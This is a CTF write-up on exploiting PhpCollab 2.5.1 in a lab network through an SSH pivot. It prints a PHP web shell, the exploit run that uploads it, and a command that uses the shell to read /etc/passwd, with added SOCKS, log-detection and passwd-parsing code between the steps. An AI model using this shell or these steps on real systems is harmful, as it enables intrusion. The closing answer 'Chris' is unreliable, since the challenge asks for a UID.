CDDC 2018: I Have You Now

Category: Kamikaze
Points: 239
Description:

  1. From your position on target 10.50.199.11, exploit the target 10.50.199.12 and gain access to the file ' /etc/passwd ' .
  2. Inside the file, identify the UID of the user whose username starts with the case-sensitive letter ' C ' .
  3. Enter the correct UID value into the response field below.
  4. Submit the Kamikaze Challenge by clicking on the Submit button.

Write-Up

After that nmap fun, we continue. This challenge took me a fair bit of time, but instead of wasting it on finding the exploit, I was tinkering with my proxy setup. I ended up using a version of a multi-hop SSH relay so I could do the hacking locally: a local port forward (-L) to the first hop, landing on a dynamic SOCKS forward (-D) that the first hop opens to the second. The setup of the proxy is something like this:

root@ctf:~# ssh -L 1080:127.0.0.1:1081 10.50.0.199 -4
root@10.50.0.199's password: 
Last login: Sat Jun  2 17:36:11 2018 from 192.168.200.6
[root@fw2018 ~]# ssh -D 1081 hero@10.50.199.11 -4
hero@10.50.199.11's password: 
Welcome to Ubuntu 14.04.5 LTS (GNU/Linux 4.4.0-111-generic x86_64)

 * Documentation:  https://help.ubuntu.com/

  System information as of Sat Jun  2 09:26:06 UTC 2018

  System load:  0.0               Processes:           82
  Usage of /:   21.6% of 9.81GB   Users logged in:     0
  Memory usage: 3%                IP address for eth0: 10.50.199.11
  Swap usage:   0%

  Graph this data and manage this system at:
    https://landscape.canonical.com/

  Get cloud support with Ubuntu Advantage Cloud Guest:
    http://www.ubuntu.com/business/services/cloud

17 packages can be updated.
15 updates are security updates.

Your Hardware Enablement Stack (HWE) is supported until April 2019.

Last login: Sat Jun  2 09:26:06 2018 from 10.50.199.2
hero@cddc-t041-ot-svr1:~$

Now, to access the internal network as if I were 10.50.199.11, I just proxy everything through 127.0.0.1:1080 as a SOCKS5 proxy (proxychains4 is configured to point there).
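To make the "SOCKS5 manner" concrete, here is the exchange proxychains performs against the ssh -D listener for every connection it wraps (RFC 1928): a method negotiation, then a CONNECT request naming the real destination. This is an added example, not code from the write-up; both sides are pure functions over bytes so it runs offline, and fake_proxy_method / fake_proxy_connect are a constructed stand-in for the ssh -D side (including an assumed allowed-destination rule), not OpenSSH's implementation.

```python
"""SOCKS5 (RFC 1928) client exchange as proxychains performs it against `ssh -D`:
method negotiation, then CONNECT. Added example; the proxy side is a constructed
stand-in, not OpenSSH code."""
import ipaddress
import struct

SOCKS_VERSION = 0x05
METHOD_NO_AUTH = 0x00
METHOD_NONE_ACCEPTABLE = 0xFF
CMD_CONNECT = 0x01
ATYP_IPV4 = 0x01
ATYP_DOMAIN = 0x03
REP_SUCCESS = 0x00
REP_NOT_ALLOWED = 0x02        # "connection not allowed by ruleset"
REP_ATYP_UNSUPPORTED = 0x08


def client_greeting(methods=(METHOD_NO_AUTH,)):
    """VER | NMETHODS | METHODS: offer the authentication methods we support."""
    return bytes([SOCKS_VERSION, len(methods), *methods])


def client_connect(host, port):
    """VER | CMD | RSV | ATYP | DST.ADDR | DST.PORT: ask the proxy to open host:port.
    Dotted quads go as ATYP 1; anything else is sent as a domain name (ATYP 3) so
    the proxy resolves it on the far side, which is what proxychains' proxy_dns
    setting relies on."""
    try:
        dst = bytes([ATYP_IPV4]) + ipaddress.IPv4Address(host).packed
    except ipaddress.AddressValueError:
        name = host.encode("idna")
        dst = bytes([ATYP_DOMAIN, len(name)]) + name
    return bytes([SOCKS_VERSION, CMD_CONNECT, 0x00]) + dst + struct.pack("!H", port)


def parse_method_reply(data):
    """VER | METHOD: the proxy picks one of our methods, or 0xFF to refuse us."""
    ver, method = data[0], data[1]
    if ver != SOCKS_VERSION:
        raise ValueError("not a SOCKS5 reply")
    if method == METHOD_NONE_ACCEPTABLE:
        raise ConnectionError("proxy accepted none of our auth methods")
    return method


def parse_connect_reply(data):
    """VER | REP | RSV | ATYP | BND.ADDR | BND.PORT -> (rep, bound_addr, bound_port)."""
    ver, rep, _rsv, atyp = data[0], data[1], data[2], data[3]
    if ver != SOCKS_VERSION:
        raise ValueError("not a SOCKS5 reply")
    if atyp == ATYP_IPV4:
        addr, rest = str(ipaddress.IPv4Address(data[4:8])), data[8:]
    elif atyp == ATYP_DOMAIN:
        n = data[4]
        addr, rest = data[5:5 + n].decode("idna"), data[5 + n:]
    else:
        raise ValueError(f"unsupported ATYP {atyp:#x}")
    (port,) = struct.unpack("!H", rest[:2])
    return rep, addr, port


# --- constructed stand-in for the proxy side (the ssh -D listener) ---------------
ALLOWED_NET = ipaddress.IPv4Network("10.50.199.0/24")   # assumed rule, for the demo only


def fake_proxy_method(greeting):
    n = greeting[1]
    offered = greeting[2:2 + n]
    chosen = METHOD_NO_AUTH if METHOD_NO_AUTH in offered else METHOD_NONE_ACCEPTABLE
    return bytes([SOCKS_VERSION, chosen])


def fake_proxy_connect(request):
    atyp = request[3]
    if atyp != ATYP_IPV4:
        rep = REP_ATYP_UNSUPPORTED      # the stand-in does no DNS resolution
    else:
        dst = ipaddress.IPv4Address(request[4:8])
        rep = REP_SUCCESS if dst in ALLOWED_NET else REP_NOT_ALLOWED
    # BND.ADDR/BND.PORT carry nothing useful for a CONNECT; the stand-in sends 0.0.0.0:0
    return bytes([SOCKS_VERSION, rep, 0x00, ATYP_IPV4]) + b"\x00" * 4 + struct.pack("!H", 0)


def socks5_connect(host, port, proxy_method=fake_proxy_method, proxy_connect=fake_proxy_connect):
    """Run the whole exchange; returns (rep, bound_addr, bound_port). Replace the two
    callables with send/recv wrappers around a socket to talk to a real 127.0.0.1:1080."""
    parse_method_reply(proxy_method(client_greeting()))   # raises if we are refused
    return parse_connect_reply(proxy_connect(client_connect(host, port)))


if __name__ == "__main__":
    print(client_connect("10.50.199.12", 3306).hex(" "))
    print(socks5_connect("10.50.199.12", 80))
```

Every connection proxychains wraps goes through exactly this: the greeting and CONNECT are sent to the local -L port, travel inside the first SSH session to the -D listener on the second hop, and the TCP connection to the destination is opened from there, which is why the target sees 10.50.199.11 as the source.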

So, first up is to nmap our target through the proxy:

root@ctf:~# proxychains4 nmap -sT -sV 10.50.199.12
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4

Starting Nmap 7.60 ( https://nmap.org ) at 2018-06-02 10:56 UTC
Nmap scan report for 10.50.199.12
Host is up (0.045s latency).
Not shown: 997 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 5.3 (protocol 2.0)
80/tcp   open  http    Apache httpd 2.2.15 ((CentOS))
3306/tcp open  mysql   MySQL (unauthorized)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 57.01 seconds

Okay, so we have a couple of services and an interesting MySQL server. What do we do now? Well, let's explore our options! First, let's try the most obvious apple in the bucket, connecting to MySQL directly:

root@ctf:~# proxychains4 nc 10.50.199.12 3306
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
h?jHost 'cddc-t041-ot-svr1.c.bitnami-qivcfh0ekq.internal' is not allowed to connect to this MySQL server

That doesn't work (our source host isn't on MySQL's allowed list), so let's try the Apache server. At first glance, it seems to be entirely unconfigured, serving only the default test page:

root@ctf:~# proxychains4 curl http://10.50.199.12
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[...]
    <h1>Apache 2 Test Page<br><font size="-1"><strong>powered by</font> CentOS</strong></h1>
[...]

Let's whip out a directory brute-forcer (Metasploit's dir_scanner here) and see what we can find:

msf >  use auxiliary/scanner/http/dir_scanner
msf auxiliary(scanner/http/dir_scanner) > set rhosts 10.50.199.12
rhosts => 10.50.199.12
msf auxiliary(scanner/http/dir_scanner) > run

[*] Detecting error code
[*] Using code '404' as not found for 10.50.199.12
^C[*] Caught interrupt from the console...
[*] Auxiliary module execution completed
msf auxiliary(scanner/http/dir_scanner) > run

[*] Detecting error code
[*] Using code '404' as not found for 10.50.199.12
[+] Found http://10.50.199.12:80/cgi-bin/ 403 (10.50.199.12)
[+] Found http://10.50.199.12:80/error/ 403 (10.50.199.12)
[+] Found http://10.50.199.12:80/icons/ 200 (10.50.199.12)
[+] Found http://10.50.199.12:80/project/ 302 (10.50.199.12)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

So, some interesting directories. Let's take a gander at the 302 redirect, following it with -L, and in here we find an interesting application:

root@ctf:~# proxychains4 curl http://10.50.199.12/project/ -L
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<!-- Powered by PhpCollab v2.5.1 //-->
<html>
<head>
<meta http-equiv='Content-Type' content="text/html; charset=ISO-8859-1" />
<title>PhpCollab</title>
<meta name='robots' content='none' />
<meta name='description' content='Groupware module. Manage web projects with team collaboration, users management, tasks and projects tracking, files approval tracking, project sites clients access, customer relationship management (Php / Mysql, PostgreSQL or Sql Server).' />
<meta name='keywords' content='PhpCollab, phpcollab.com, Sourceforge, management, web, projects, tasks, organizations, reports, Php, MySql, Sql Server, mssql, Microsoft Sql Server, PostgreSQL, module, application, module, file management, project site, team collaboration, free, crm, CRM, cutomer relationship management, workflow, workgroup' />
<meta name='copyright' content='PHPCollab' />
<script type='text/Javascript'>
<!--
var gBrowserOK = true;
var gOSOK = true;
var gCookiesOK = true;
var gFlashOK = true;
// -->
</script>
<script type='text/javascript' src='../javascript/general.js'></script>
<script type='text/JavaScript' src='../javascript/overlib_mini.js'></script>
<link rel='stylesheet' href='../themes/default/stylesheet.css' type='text/css' />

</head>
<body onLoad='document.loginForm.loginForm.focus();'><div id='overDiv' style='position:absolute; visibility:hidden; z-index:1000;'></div>

<p id="header"><img src="../logos_clients/1.php" border="0" alt=""></p>

<p id='account'>&nbsp;</p>

<p id='navigation'><a href='../general/login.php?&PHPSESSID=30ai85k3c3i8jn3mnesmvjedf4'>Log In</a>&nbsp;&nbsp;<a href='../general/systemrequirements.php?&PHPSESSID=30ai85k3c3i8jn3mnesmvjedf4'>System Requirements</a>&nbsp;&nbsp;<a href='../general/license.php?&PHPSESSID=30ai85k3c3i8jn3mnesmvjedf4'>License</a></p>

<p class='breadcrumbs'>&nbsp;</p>

<a name='loginAnchor'></a>

<form accept-charset='UNKNOWN' method='POST' action='../general/login.php?auth=test&PHPSESSID=30ai85k3c3i8jn3mnesmvjedf4' name='loginForm' enctype='application/x-www-form-urlencoded'>

<h1 class="heading">PhpCollab : Log In</h1>

<table class='content' cellspacing='0' cellpadding='0'><tr><th colspan='2'>Please log in</th></tr><tr class='odd'><td valign='top' class='leftvalue'>Language :</td><td><select name="defaultLanguage"><option value="ar">Arabic</option><option value="az">Azerbaijani</option><option value="pt-br">Brazilian Portuguese</option><option value="bg">Bulgarian</option><option value="ca">Catalan</option><option value="zh">Chinese simplified</option><option value="zh-tw">Chinese traditional</option><option value="cs-iso">Czech (iso)</option><option value="cs-win1250">Czech (win1250)</option><option value="da">Danish</option><option value="nl">Dutch</option><option value="en" selected>English</option><option value="et">Estonian</option><option value="fr">French</option><option value="de">German</option><option value="hu">Hungarian</option><option value="is">Icelandic</option><option value="in">Indonesian</option><option value="it">Italian</option><option value="ja">Japanese</option><option value="ko">Korean</option><option value="lv">Latvian</option><option value="no">Norwegian</option><option value="pl">Polish</option><option value="pt">Portuguese</option><option value="ro">Romanian</option><option value="ru">Russian</option><option value="sk-win1250">Slovak (win1250)</option><option value="es">Spanish</option><option value="tr">Turkish</option><option value="uk">Ukrainian</option></select>&nbsp;</td></tr>
<tr class='odd'><td valign='top' class='leftvalue'>* User Name :</td><td><input value='' type='text' name='loginForm'>&nbsp;</td></tr>
<tr class='odd'><td valign='top' class='leftvalue'>* Password :</td><td><input value='' type='password' name='passwordForm'>&nbsp;</td></tr>
<tr class='odd'><td valign='top' class='leftvalue'>&nbsp;</td><td><input type='submit' name='save' value='Log In'><br/><br/><br/><a href='../general/sendpassword.php?&PHPSESSID=30ai85k3c3i8jn3mnesmvjedf4'>Forgot password ?</a>&nbsp;</td></tr>
</table>
<hr />
</form>
<p id="footer">PhpCollab v2.5.1 </p>


        </body>
        </html>

What's PhpCollab anyway? It's a groupware/project-management web application, but its purpose isn't important; what matters is that we now have a product name and a version. A quick Google search gives us an exploit for arbitrary file upload.

Since that exploit lets us upload anything we want, let's dummy up a simple PHP shell page:

<?php
if(isset($_REQUEST['cmd'])){
    $cmd = ($_REQUEST['cmd']);
    system($cmd);
    die;
}
?>

Proceed to upload it with the exploit script:

root@ctf:~# proxychains4 ./exploit.py http://10.50.199.12/project 1 shell.php 
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[*] Trying to exploit with URL : http://10.50.199.12/project/clients/editclient.php?id=1&action=update...
[OK] Backdoor link : http://10.50.199.12/project/logos_clients/1.php

Now that our PHP shell is sitting at http://10.50.199.12/project/logos_clients/1.php, we can get our hacking done and read /etc/passwd:
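From the defender's side, both steps above leave a clear footprint in the Apache access log: the dir_scanner run is a burst of 404s from one client, and the web shell is a .php file being requested out of a directory (logos_clients/) that should only ever serve uploaded images. The following is an added example, not part of the write-up or of PhpCollab: it parses combined-format log lines and applies those two rules. SAMPLE_LOG is constructed, and UPLOAD_DIRS, EXEC_EXTENSIONS and the burst threshold are assumptions for this example, not PhpCollab or Apache settings.

```python
"""Two access-log detections: server-side script requested from an upload-only
directory, and a 404 burst from one client (directory brute-force). Added example;
the log lines are constructed."""
import posixpath
import re
from collections import Counter

# Apache "combined" format: %h %l %u %t "%r" %>s %b "%{Referer}i" "%{User-agent}i"
COMBINED = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) (?P<proto>HTTP/[\d.]+)" '
    r'(?P<status>\d{3}) (?P<size>\d+|-)'
    r'(?: "(?P<referer>[^"]*)" "(?P<ua>[^"]*)")?$'
)

# Assumed for this example: directories that should only hold uploaded images.
UPLOAD_DIRS = ("/project/logos_clients/", "/project/files/")
EXEC_EXTENSIONS = (".php", ".phtml", ".php3", ".php5", ".phar")

# Constructed sample log, loosely following the write-up's sequence of requests.
SAMPLE_LOG = [
    '10.50.199.11 - - [02/Jun/2018:10:58:01 +0000] "GET /project/ HTTP/1.1" 302 - "-" "curl/7.58.0"',
    '10.50.199.11 - - [02/Jun/2018:10:58:02 +0000] "GET /general/login.php HTTP/1.1" 200 5120 "-" "curl/7.58.0"',
    '10.50.199.11 - - [02/Jun/2018:11:01:10 +0000] "GET /admin/ HTTP/1.1" 404 286 "-" "Mozilla/4.0"',
    '10.50.199.11 - - [02/Jun/2018:11:01:10 +0000] "GET /backup/ HTTP/1.1" 404 286 "-" "Mozilla/4.0"',
    '10.50.199.11 - - [02/Jun/2018:11:01:11 +0000] "GET /test/ HTTP/1.1" 404 286 "-" "Mozilla/4.0"',
    '10.50.199.11 - - [02/Jun/2018:11:01:11 +0000] "GET /old/ HTTP/1.1" 404 286 "-" "Mozilla/4.0"',
    '10.50.199.11 - - [02/Jun/2018:11:01:12 +0000] "GET /dev/ HTTP/1.1" 404 286 "-" "Mozilla/4.0"',
    '10.50.199.11 - - [02/Jun/2018:11:01:12 +0000] "GET /icons/ HTTP/1.1" 200 1024 "-" "Mozilla/4.0"',
    '10.50.199.11 - - [02/Jun/2018:11:05:44 +0000] "POST /project/clients/editclient.php?id=1&action=update HTTP/1.1" 200 312 "-" "python-requests/2.18.4"',
    '10.50.199.11 - - [02/Jun/2018:11:06:02 +0000] "POST /project/logos_clients/1.php HTTP/1.1" 200 1489 "-" "curl/7.58.0"',
    '10.50.199.11 - - [02/Jun/2018:11:06:30 +0000] "GET /project/logos_clients/1.php?cmd=id HTTP/1.1" 200 54 "-" "Mozilla/5.0"',
    '192.168.200.6 - - [02/Jun/2018:11:07:00 +0000] "GET /project/logos_clients/logo.png HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
    '192.168.200.6 - - [02/Jun/2018:11:07:00 +0000] "GET /favicon.ico HTTP/1.1" 404 286 "-" "Mozilla/5.0"',
]


def parse_line(line):
    """Return the fields of one combined-format line as a dict, or None if malformed."""
    m = COMBINED.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    return rec


def is_exec_in_upload_dir(path):
    """True if the request path names a server-side script under an upload-only dir.
    Drops the query string, collapses '..' and compares case-insensitively so that
    '/project/logos_clients/1.PHP?cmd=id' is caught and
    '/project/logos_clients/../general/login.php' is not."""
    clean = posixpath.normpath(path.split("?", 1)[0]).lower()
    return clean.startswith(UPLOAD_DIRS) and clean.endswith(EXEC_EXTENSIONS)


def detect(lines, burst_threshold=5):
    """Return findings: dicts with a 'rule' key ('upload-dir-exec' or 'dir-bruteforce')."""
    findings = []
    not_found = Counter()
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue                      # malformed line: skip, never crash the detector
        if is_exec_in_upload_dir(rec["path"]):
            findings.append({"rule": "upload-dir-exec", "ip": rec["ip"],
                             "path": rec["path"].split("?", 1)[0],
                             "status": rec["status"], "ts": rec["ts"]})
        if rec["status"] == 404:
            not_found[rec["ip"]] += 1
    for ip, n in sorted(not_found.items()):
        if n >= burst_threshold:
            findings.append({"rule": "dir-bruteforce", "ip": ip, "count": n})
    return findings


if __name__ == "__main__":
    for f in detect(SAMPLE_LOG):
        print(f)
```

The first rule is the stronger one: a request for anything executable under an upload directory is a finding regardless of status code, and the matching prevention is to deny script execution in that directory at the web server (or to store uploads outside the document root) so that an uploaded 1.php is served as bytes rather than run. The 404-burst rule is a rate heuristic, so tune the threshold and window to the site's normal error rate before alerting on it.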

root@ctf:~# proxychains4 curl 'http://10.50.199.12/project/logos_clients/1.php' --data 'cmd=cat /etc/passwd'
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.12
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.50.199.12:80  ...  OK
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
abrt:x:173:173::/etc/abrt:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
saslauth:x:499:76:Saslauthd user:/var/empty/saslauth:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
tcpdump:x:72:72::/:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash
Chris:x:500:501::/home/Chris:/bin/bash
osboxes:x:501:502::/home/osboxes:/bin/bash

Therefore, the flag is Chris.
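The challenge's second step, finding the UID of the user whose name starts with a case-sensitive 'C', is a small exercise in parsing the seven-field /etc/passwd format. The following is an added example, not part of the write-up: it parses passwd records, answers that question, and also runs the checks a reviewer of this file would want, listing accounts that can actually log in (the dump above shows the mysql service account with /bin/bash, which is worth noticing) and flagging extra UID 0 or duplicate-UID accounts. SAMPLE_PASSWD is a constructed excerpt in the same format as the file dumped above.

```python
"""Parse /etc/passwd, look up a UID by case-sensitive name prefix, and run two
account-hygiene checks. Added example; SAMPLE_PASSWD is a constructed excerpt."""
from collections import Counter
from dataclasses import dataclass

# Shells that do not give an interactive login (assumed list, extend for your distro).
NOLOGIN_SHELLS = {"/sbin/nologin", "/usr/sbin/nologin", "/bin/false",
                  "/bin/sync", "/sbin/halt", "/sbin/shutdown"}

SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
nobody:x:99:99:Nobody:/:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash
Chris:x:500:501::/home/Chris:/bin/bash
osboxes:x:501:502::/home/osboxes:/bin/bash
"""


@dataclass(frozen=True)
class PasswdEntry:
    name: str
    uid: int
    gid: int
    gecos: str
    home: str
    shell: str


def parse_passwd(text):
    """name:password:UID:GID:GECOS:home:shell, one record per line."""
    entries = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            raise ValueError(f"line {lineno}: expected 7 colon-separated fields, got {len(fields)}")
        name, _pw, uid, gid, gecos, home, shell = fields
        entries.append(PasswdEntry(name, int(uid), int(gid), gecos, home, shell))
    return entries


def uid_for_prefix(entries, prefix):
    """UID of the single user whose name starts with prefix (case-sensitive)."""
    hits = [e for e in entries if e.name.startswith(prefix)]
    if len(hits) != 1:
        raise LookupError(f"{len(hits)} users start with {prefix!r}, expected exactly one")
    return hits[0].uid


def interactive_accounts(entries):
    """Names of accounts whose shell permits an interactive login."""
    return [e.name for e in entries if e.shell not in NOLOGIN_SHELLS]


def suspicious_uids(entries):
    """(UID 0 accounts other than root, UIDs shared by more than one name)."""
    counts = Counter(e.uid for e in entries)
    extra_root = [e.name for e in entries if e.uid == 0 and e.name != "root"]
    shared = sorted(uid for uid, n in counts.items() if n > 1)
    return extra_root, shared


if __name__ == "__main__":
    entries = parse_passwd(SAMPLE_PASSWD)
    print("UID for prefix 'C':", uid_for_prefix(entries, "C"))
    print("interactive accounts:", interactive_accounts(entries))
    print("suspicious UIDs:", suspicious_uids(entries))
```

The prefix match is deliberately case-sensitive, as the challenge text demands, so a lowercase 'c' matches nothing and raises rather than silently returning the wrong account.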
